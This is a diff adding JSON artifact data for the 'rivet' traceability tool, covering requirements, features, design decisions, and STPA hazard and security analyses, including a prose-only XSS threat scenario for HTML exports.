+          "target": "CTRL-REQIF",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-Q-3",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-4",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "The system must identify commits that modify files in configured traced paths without referencing any artifact. Must support path-based configuration for traced vs. exempt directories and an artifact whitelist for known-unimplemented items.\n",
+      "id": "REQ-019",
+      "links": [
+        {
+          "target": "SC-7",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "core",
+        "traceability",
+        "git"
+      ],
+      "title": "Orphan commit detection",
+      "type": "requirement"
+    },
+    {
+      "description": "Tests for cross-repo features covering FEAT-033 through FEAT-039. Verifies externals config block parsing, prefix:ID syntax resolution, rivet sync fetch/clone operations, rivet lock pin generation, cross-repo link validation, circular dependency detection, and dashboard external project browsing.\n",
+      "id": "TEST-018",
+      "links": [
+        {
+          "target": "REQ-020",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "cross-repo",
+        "swe-5"
+      ],
+      "title": "Cross-repo linking and external artifact resolution tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nInability to demonstrate regulatory compliance to an auditor.  If\n\ntraceability reports are incomplete,\ninconsistent,\nor fabricated,\nthe\n\norganization cannot pass certification audits,\npotentially blocking\n\nproduct release or triggering recalls.\n",
+      "id": "L-2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Loss of compliance evidence",
+      "type": "loss"
+    },
+    {
+      "description": "",
+      "id": "DD-029",
+      "links": [
+        {
+          "target": "REQ-032",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "rendering",
+        "markdown",
+        "architecture"
+      ],
+      "title": "pulldown-cmark for artifact description rendering",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-C-26",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-26",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-19",
+          "type": "prevents"
+        },
+        {
+          "target": "H-9",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-O-9",
+      "links": [
+        {
+          "target": "CTRL-OSLC",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-O-9",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-5",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nA ReqIF file exported from StrictDoc interleaves ATTRIBUTE-DEFINITION-\n\nSTRING and ATTRIBUTE-DEFINITION-ENUMERATION elements within the same\n\nSPEC-ATTRIBUTES parent.  The XML deserializer (quick-xml) without the\n\noverlapped-lists feature treats this as duplicate elements of the same\n\ntype and fails with a \"duplicate field\" error [UCA-Q-1].  All\n\nartifacts in the file are lost [H-2].  This is a known bug that was\n\nfixed by enabling the overlapped-lists feature,\nbut similar\n\ninterleaving patterns in other ReqIF exports could trigger\n\nanalogous failures.\n",
+      "id": "LS-Q-1",
+      "links": [
+        {
+          "target": "UCA-Q-1",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-2",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Interleaved XML elements cause parse failure",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nCoverage matrices and statistics must be derived from link data that\n\nhas passed validation in the current session.  Cached or stale\n\nmetrics must be clearly labeled with their validation timestamp.\n",
+      "id": "SC-3",
+      "links": [
+        {
+          "target": "H-3",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet must compute coverage metrics only from validated, current data",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nThe MODULE.bazel parser must emit a diagnostic for any Starlark\n\nconstruct it does not support (load statements,\nvariable references,\n\nstring concatenation,\nconditionals). Silently skipping constructs\n\nis forbidden. The parser must report what it could not parse and\n\nwhat dependencies may be missing from the result.\n",
+      "id": "SC-13",
+      "links": [
+        {
+          "target": "H-11",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet build-system parsers must reject unrecognized constructs with diagnostics",
+      "type": "system-constraint"
+    },
+    {
+      "description": "",
+      "id": "ARCH-SYS-001",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "allocated-from"
+        },
+        {
+          "target": "ARCH-CORE-001",
+          "type": "contains"
+        },
+        {
+          "target": "ARCH-CLI-001",
+          "type": "contains"
+        },
+        {
+          "target": "ARCH-DASH-001",
+          "type": "contains"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "system"
+      ],
+      "title": "Rivet System (top-level)",
+      "type": "aadl-component"
+    },
+    {
+      "description": "",
+      "id": "CC-O-2",
+      "links": [
+        {
+          "target": "CTRL-OSLC",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-O-2",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-5",
+          "type": "prevents"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nExternal repo path resolution must canonicalize paths,\nhandle\n\nrelative vs absolute differences,\nand fail with a clear diagnostic\n\nif a path is unreachable rather than silently skipping the external.\n\nPlatform-specific path separators must be normalized.\n",
+      "id": "SC-20",
+      "links": [
+        {
+          "target": "H-18",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet must normalize and validate external paths before use",
+      "type": "system-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-C-17",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-17",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-11",
+          "type": "prevents"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "The LSP server must validate that any file URI received via textDocument/didChange or textDocument/didSave is within the project's configured source paths (as declared in rivet.yaml). Files outside the configured sources must be ignored with a diagnostic log entry.  This prevents injection of crafted artifact content from non-project files.\n",
+      "id": "SSC-7",
+      "links": [
+        {
+          "target": "SH-7",
+          "type": "prevents-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "LSP must only process files within the project's configured source paths",
+      "type": "sec-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-C-7",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-7",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-L-4",
+      "links": [
+        {
+          "target": "CTRL-CLI",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-L-4",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-4",
+          "type": "prevents"
+        },
+        {
+          "target": "H-2",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nA ReqIF file uses UUIDs as SpecObject identifiers (IDENTIFIER\n\nattribute) while storing human-readable IDs in the ReqIF.ForeignID\n\nattribute.  The ReqIF adapter's process model maps IDENTIFIER to\n\nthe artifact's id field,\nproducing artifacts with UUID-based IDs\n\nlike \"550e8400-e29b-41d4-a716-446655440000\" [UCA-Q-3].  Links\n\ncreated from these IDs are valid but unreadable.  When the adapter\n\nshould have used ReqIF.ForeignID (e.g.,\n\"ZEP-REQ-042\") as the\n\nartifact ID.\n",
+      "id": "LS-Q-2",
+      "links": [
+        {
+          "target": "UCA-Q-3",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-4",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "UUID-based identifiers lose human readability",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nThe developer edits an artifact YAML file,\nadding a broken link\n\n(target:\nNOPE-999),\nand saves via Ctrl+S. The editor sends\n\ntextDocument/didSave to the LSP server. The LSP handler calls\n\nthe salsa validation query,\nbut the file-content input was set\n\nwhen the file was first opened and has not been updated. Salsa\n\nreturns the memoized diagnostics from the pre-edit file content.\n\nThe editor shows zero errors. The developer proceeds to commit,\n\nbelieving the file is valid,\nwhile it contains a broken link\n\nthat would have been caught by a fresh validation pass.\n",
+      "id": "LS-L-4",
+      "links": [
+        {
+          "target": "UCA-C-26",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-19",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-9",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Salsa memoization returns cached diagnostics from a previous file version",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "The system must extract traceability markers from test source code and test results, linking test cases to requirements without requiring manual YAML maintenance. Must support language-specific markers (attributes, decorators, comments) and test result formats (JUnit XML, cargo test JSON).\n",
+      "id": "REQ-026",
+      "links": [
+        {
+          "target": "SC-7",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "traceability",
+        "automation"
+      ],
+      "title": "Test-to-requirement traceability extraction",
+      "type": "requirement"
+    },
+    {
+      "description": "Full project validation from trace.yaml — load schemas, import artifacts from all sources, build link graph, run validation.\n",
+      "id": "FEAT-007",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cli",
+        "phase-1"
+      ],
+      "title": "CLI validate command",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe semi-naive evaluator must enforce a maximum iteration count\n\n(proportional to the number of facts) and abort with a clear error\n\nif the fixpoint is not reached. This provides a safety net even\n\nthough Datalog theoretically guarantees termination.\n",
+      "id": "SC-VAR-006",
+      "links": [
+        {
+          "target": "H-VAR-006",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Datalog evaluator must enforce a fixpoint iteration bound",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nEvery import,\nexport,\nsync,\nand merge operation must account for all\n\ninput artifacts.  If an artifact cannot be processed,\nRivet must emit\n\nan explicit diagnostic and either fail the operation or quarantine the\n\nunprocessable item — never silently drop it.\n",
+      "id": "SC-2",
+      "links": [
+        {
+          "target": "H-2",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet must never silently discard artifacts or links during any operation",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nTwo bridge schemas define conflicting traceability rules\n\nfor the same artifact type,\ncausing impossible-to-satisfy\n\nrequirements or contradictory error messages.\n",
+      "id": "H-IMPL-005",
+      "links": [
+        {
+          "target": "L-IMPL-003",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Bridge schema creates bidirectional rule conflicts",
+      "type": "hazard"
+    },
+    {
+      "description": "Unknown embed names produce an EmbedError with visible HTML rendering (SC-EMBED-3). No embed name can trigger file I/O, shell execution, or unbounded computation.\n",
+      "id": "SSC-IMPL-003",
+      "links": [
+        {
+          "target": "SH-IMPL-003",
+          "type": "prevents-sec-hazard"
+        }
+      ],
+      "status": "draft",
+      "tags": [],
+      "title": "Embed parser MUST reject unknown embed names with visible error",
+      "type": "sec-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-O-6",
+      "links": [
+        {
+          "target": "CTRL-OSLC",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-O-6",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-8",
+          "type": "prevents"
+        },
+        {
+          "target": "H-4",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nCI pipeline does not run rivet validate on pull requests that\n\nmodify artifact YAML files.\n",
+      "id": "UCA-I-1",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CI",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nOSLC client syncs after a compliance report has already been\n\ngenerated from stale data.\n",
+      "id": "UCA-O-8",
+      "links": [
+        {
+          "target": "H-6",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-OSLC",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nArtifact data corrupted,\nsilently lost,\nor leaked through\n\nsynchronization with external tools.  When bidirectional sync\n\noverwrites local authoritative data or exposes controlled-distribution\n\ncontent to unauthorized systems,\nthe organization loses control of its\n\nengineering records.\n",
+      "id": "L-3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Loss of data sovereignty",
+      "type": "loss"
+    },
+    {
+      "description": "Evaluate s-expression predicates against a single artifact. Supports field access (type, status, id, title, tags, custom fields), comparison operators (=, !=, >, <, >=, <=), set membership (in, has-tag, has-field), string matching (matches, contains), link predicates (linked-by, linked-from, linked-to, links-count), and logical connectives (and, or, not). This is the foundation for CLI --filter flags. Approximately 300 lines.\n",
+      "id": "FEAT-107",
+      "links": [
+        {
+          "target": "REQ-041",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-048",
+          "type": "implements"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "s-expression",
+        "evaluator",
+        "phase-1"
+      ],
+      "title": "Predicate evaluator for single-artifact filtering",
+      "type": "feature"
+    },
+    {
+      "description": "\nAn artifact referenced by a Rivet link is deleted in an external\n\nALM tool.  The OSLC TRS change log records the deletion,\nbut\n\nRivet does not process it,\nleaving a dangling forward reference.\n",
+      "id": "H-1.1",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "refines"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet permits links to artifacts deleted in external tools",
+      "type": "sub-hazard"
+    },
+    {
+      "description": "",
+      "id": "CC-C-2",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-2",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "The needs-json adapter uses a user-defined type-mapping table in rivet.yaml to convert sphinx-needs type names to rivet schema types, rather than hard-coding a fixed mapping or auto-generating types.\n",
+      "id": "DD-020",
+      "links": [
+        {
+          "target": "REQ-025",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "interchange",
+        "adapter"
+      ],
+      "title": "Configurable type mapping for needs.json import",
+      "type": "design-decision"
+    },
+    {
+      "description": "Every computed embed in HTML export includes a provenance footer with git commit hash and timestamp (SC-EMBED-4).\n",
+      "id": "FEAT-075",
+      "links": [
+        {
+          "target": "REQ-035",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Export provenance stamps on computed embeds",
+      "type": "feature"
+    },
+    {
+      "description": "\nA bridge schema links artifact types that shouldn't be linked,\n\nor fails to link types that should be. Coverage reports show\n\nfalse completeness or false gaps.\n",
+      "id": "L-IMPL-003",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Schema bridge creates incorrect traceability",
+      "type": "loss"
+    },
+    {
+      "description": "\nA MODULE.bazel file contains `bazel_dep(version=\"1.0\",\nname=\"meld\")`.\n\nThe parser assumes positional argument order (name first,\nversion\n\nsecond) rather than parsing keyword arguments [UCA-C-17]. It\n\nextracts name=\"1.0\" and version=\"meld\". The dependency is\n\nrecorded with the wrong module name,\ncausing cross-repo\n\nresolution to fail silently or resolve against the wrong repo.\n",
+      "id": "LS-C-12",
+      "links": [
+        {
+          "target": "UCA-C-17",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-11",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Parser swaps keyword argument name and value",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nLink type semantics differ between tools.  A \"derives\" link in\n\nDOORS may mean \"refines\" in Rivet's schema,\nbut an incorrect\n\nmapping treats it as \"satisfies,\" inflating coverage metrics.\n",
+      "id": "H-4.2",
+      "links": [
+        {
+          "target": "H-4",
+          "type": "refines"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet maps external link types to incorrect semantic relationships",
+      "type": "sub-hazard"
+    },
+    {
+      "description": "Loads and merges YAML schema files (common + domain overlays). Produces the merged SchemaSet used by validation and matrix.\n",
+      "id": "ARCH-CORE-SCHEMA",
+      "links": [
+        {
+          "target": "REQ-002",
+          "type": "allocated-from"
+        },
+        {
+          "target": "REQ-003",
+          "type": "allocated-from"
+        },
+        {
+          "target": "REQ-010",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "core",
+        "schema"
+      ],
+      "title": "Schema Engine",
+      "type": "aadl-component"
+    },
+    {
+      "description": "\nThe s-expression evaluator must be testable against a reference\n\nimplementation or formal specification. For every predicate and\n\nquantifier,\nthe evaluator's result must match a specification-defined\n\ntruth table. Property-based tests must verify equivalences (e.g.,\n\n(not (and A B)) == (or (not A) (not B))).\n",
+      "id": "SC-VAR-004",
+      "links": [
+        {
+          "target": "H-VAR-004",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "S-expression evaluator must produce identical results to a reference implementation",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Schema-aware project scaffolding with presets (dev, aspice, stpa, cybersecurity, aadl). Generates rivet.yaml, directories, and example artifacts matching the chosen domain schema.\n",
+      "id": "FEAT-026",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cli",
+        "schema",
+        "phase-2"
+      ],
+      "title": "rivet init --preset command",
+      "type": "feature"
+    },
+    {
+      "description": "Validation diagnostics for traceability rules (missing required links, incomplete coverage) must respect artifact maturity. Artifacts with status \"draft\" produce info-level diagnostics for unfulfilled links instead of errors. Only \"active\" or \"approved\" artifacts are held to full traceability enforcement. This distinguishes \"not yet done\" from \"broken\" in projects with work-in-progress artifacts.\n",
+      "id": "REQ-039",
+      "links": [],
+      "status": "draft",
+      "tags": [
+        "validation",
+        "workflow",
+        "core"
+      ],
+      "title": "Draft-aware validation severity",
+      "type": "requirement"
+    },
+    {
+      "description": "Parse errors are shown as yaml-parse-error diagnostics with line and column positions instead of silently returning empty results.\n",
+      "id": "FEAT-083",
+      "links": [
+        {
+          "target": "REQ-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "LSP surfaces YAML parse errors as diagnostics",
+      "type": "feature"
+    },
+    {
+      "description": "Import requirement and constraint elements from SysML v2 textual notation files (.sysml) as rivet artifacts. Parse SysML v2 using a rowan-based lossless parser (same pattern as spar's AADL parser). Extract requirement elements with their attributes, rationale, and satisfy/verify relationships, mapping them to rivet artifact YAML.\n",
+      "id": "REQ-037",
+      "links": [],
+      "status": "draft",
+      "tags": [
+        "sysml",
+        "adapter",
+        "future"
+      ],
+      "title": "SysML v2 artifact import",
+      "type": "requirement"
+    },
+    {
+      "description": "Modify an existing artifact's fields, status, tags, title, or description from the command line. Validates the artifact exists, the new values conform to schema (allowed values, field types), and the modification doesn't break link constraints. Supports --set-field, --set-status, --set-title, --add-tag, --remove-tag.\n",
+      "id": "FEAT-053",
+      "links": [
+        {
+          "target": "REQ-031",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-028",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cli",
+        "mutation",
+        "phase-3"
+      ],
+      "title": "rivet modify — update artifact fields from CLI",
+      "type": "feature"
+    },
+    {
+      "description": "HTML export supports runtime config.js for version switcher dropdown and homepage back-link.\n",
+      "id": "REQ-036",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "export",
+        "navigation",
+        "versioning"
+      ],
+      "title": "HTML export supports version switcher and homepage link",
+      "type": "requirement"
+    },
+    {
+      "description": "\nCore does not validate links when artifacts have been modified\n\nsince the last validation pass.\n",
+      "id": "UCA-C-1",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "New cybersecurity.yaml schema with 10 artifact types covering TARA (asset, threat-scenario, risk-assessment), SEC.1 (cybersecurity-goal, cybersecurity-req), SEC.2 (cybersecurity-design), SEC.3 (cybersecurity-implementation), SEC.4 (cybersecurity-verification). Includes 2 link types and 10 traceability rules.\n",
+      "id": "FEAT-017",
+      "links": [
+        {
+          "target": "REQ-016",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-010",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "schema",
+        "cybersecurity",
+        "phase-1"
+      ],
+      "title": "Cybersecurity schema (SEC.1-4)",
+      "type": "feature"
+    },
+    {
+      "description": "\nEvery operation that produces output (reports,\nmetrics,\nexports) must\n\nfirst validate that all artifact links resolve to existing,\ncorrectly-\n\ntyped targets.  Dangling or type-mismatched links must be reported as\n\nerrors,\nnot warnings.\n",
+      "id": "SC-1",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet must validate all cross-references and report dangling links before any output",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nA project uses two schema files:\nthe ASPICE schema requires\n\n\"verification-method\"\nwhen status=approved,\nwhile a custom overlay\n\nschema forbids \"verification-method\" when safety-level=QM (to\n\nreduce overhead for non-safety items). An artifact with both\n\nstatus=approved and safety-level=QM triggers both rules. The\n\nschema merge algorithm does not check for rule conflicts [UCA-C-12].\n\nThe developer sees two contradictory validation errors and disables\n\none rule via a schema override,\nundermining the validation system.\n",
+      "id": "LS-C-7",
+      "links": [
+        {
+          "target": "UCA-C-12",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-10",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Contradictory conditional rules not detected at schema load",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nWhen collecting artifacts for a variant,\nthe system must follow\n\nlink graph edges to include transitively reachable artifacts,\nnot\n\nonly directly bound ones. The scoping algorithm must be documented\n\nand configurable (direct-only vs transitive).\n",
+      "id": "SC-VAR-005",
+      "links": [
+        {
+          "target": "H-VAR-005",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Variant artifact scoping must include transitive dependencies",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nCLI does not invoke validation before generating reports.\n",
+      "id": "UCA-L-2",
+      "links": [
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-6",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CLI",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nThe snapshot's stats,\ncoverage,\nand diagnostics MUST match\n\nwhat rivet validate/stats/coverage would produce at the\n\nsame point in time. Use the same computation functions.\n",
+      "id": "SC-IMPL-001",
+      "links": [
+        {
+          "target": "H-IMPL-001",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Snapshot MUST capture identical data to live validation",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Import/export of ReqIF 1.2 XML. Handles spec-objects, spec-types, and spec-relations mapping to rivet artifacts and links.\n",
+      "id": "ARCH-ADAPT-REQIF",
+      "links": [
+        {
+          "target": "FEAT-010",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "adapter",
+        "reqif"
+      ],
+      "title": "ReqIF 1.2 Adapter",
+      "type": "aadl-component"
+    },
+    {
+      "description": "Pluggable providers that read cross-repo dependency information from build system manifests. Bazel provider parses MODULE.bazel for bazel_dep() and git_override() entries. Nix provider parses flake.lock for input pins. Custom JSON provider reads SCORE-style known_good.json. All providers resolve repo URLs, pinned commits, and workspace paths for use by cross-repo linking and source code traceability scanning.\n",
+      "id": "FEAT-044",
+      "links": [
+        {
+          "target": "REQ-027",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-022",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cross-repo",
+        "bazel",
+        "nix",
+        "phase-3"
+      ],
+      "title": "Build-system dependency providers",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CC-O-5",
+      "links": [
+        {
+          "target": "CTRL-OSLC",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-O-5",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-2",
+          "type": "prevents"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-5",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nA traceability rule (forall (where type \"requirement\") (exists\n\n(linked-by satisfies) (where type \"specification\"))) should check\n\nthat each requirement has a satisfies link to some specification.\n\nA scoping bug evaluates the inner (exists) against ALL specifications\n\nin the store rather than only those linked from the current requirement.\n\nSince at least one specification exists in any real project,\nthe rule\n\npasses vacuously for every requirement,\neven orphaned ones.\n",
+      "id": "LS-VAR-003",
+      "links": [
+        {
+          "target": "UCA-VAR-004",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-VAR-004",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Nested quantifier scope error makes traceability rule vacuously true",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "MCP tools return artifact data, diagnostics, and stats scoped to the project directory. No absolute paths or file contents outside the project root are exposed.\n",
+      "id": "SSC-IMPL-005",
+      "links": [
+        {
+          "target": "SH-IMPL-002",
+          "type": "prevents-sec-hazard"
+        }
+      ],
+      "status": "draft",
+      "tags": [],
+      "title": "MCP tool results MUST NOT include file system paths outside project",
+      "type": "sec-constraint"
+    },
+    {
+      "description": "Scans source code for rivet:verifies markers and injects ephemeral test coverage nodes into the link graph.\n",
+      "id": "ARCH-CORE-SCANNER",
+      "links": [
+        {
+          "target": "REQ-026",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture",
+        "testing",
+        "traceability"
+      ],
+      "title": "Test-to-Requirement Source Scanner",
+      "type": "aadl-component"
+    },
+    {
+      "description": "Schema introspection commands (list, show, links, rules) that let users explore loaded schemas from the CLI. Supports --format json for agent and tooling integration.\n",
+      "id": "FEAT-023",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cli",
+        "schema",
+        "phase-2"
+      ],
+      "title": "rivet schema command",
+      "type": "feature"
+    },
+    {
+      "description": "An attacker (insider or supply-chain) commits a YAML artifact with a script injection payload.  A project manager runs 'rivet export' to produce a standalone HTML report for external review.  The HTML export includes the unescaped payload; any reviewer who opens the file in a browser executes the attacker's script.  Since HTML exports are often sent by email or hosted on shared drives, the attack surface is broader than the dashboard.\n",
+      "id": "SLS-4",
+      "links": [
+        {
+          "target": "SUCA-CLI-2",
+          "type": "caused-by-sec-uca"
+        },
+        {
+          "target": "SH-4",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "XSS via crafted artifact in HTML export served to reviewers",
+      "type": "sec-scenario"
+    }
+  ],
+  "count": 623,
+  "prefix": "rivet",
+  "project": "rivet"
+}

--- a/data/rivet/stats.json
+++ b/data/rivet/stats.json
@@ -1,0 +1,32 @@
+{
+  "by_status": {
+    "accepted": 4,
+    "active": 2,
+    "approved": 238,
+    "draft": 63,
+    "implemented": 20,
+    "partial": 1,
+    "unset": 295
+  },
+  "by_type": {
+    "aadl-component": 32,
+    "controlled-process": 5,
+    "controller": 8,
+    "controller-constraint": 67,
+    "design-decision": 51,
+    "feature": 149,
+    "hazard": 39,
+    "loss": 13,
+    "loss-scenario": 39,
